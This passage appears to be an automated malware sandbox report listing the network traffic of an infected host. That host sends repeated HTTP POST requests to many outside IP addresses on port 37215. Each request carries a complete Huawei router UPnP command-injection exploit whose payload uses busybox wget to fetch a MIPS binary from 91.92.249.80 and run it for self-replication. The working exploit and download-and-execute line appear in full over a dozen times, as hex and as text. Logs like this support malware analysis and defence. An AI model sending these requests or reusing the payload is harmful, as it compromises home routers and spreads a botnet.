                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1749192.168.2.2340168145.4.165.11037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.542162895 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1750192.168.2.2335502109.95.74.8737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.542164087 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1751192.168.2.2333226157.235.202.24937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.542174101 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1752192.168.2.235047693.45.232.6937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.542253971 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1753192.168.2.234451841.23.141.15737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.542256117 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1754192.168.2.234369241.209.56.19337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.542351007 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1755192.168.2.2334708157.5.92.12837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.542355061 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1756192.168.2.2353756135.115.76.6737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.542366028 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1757192.168.2.2350146197.227.200.5437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.542376995 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1758192.168.2.235414623.64.38.3137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.542385101 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
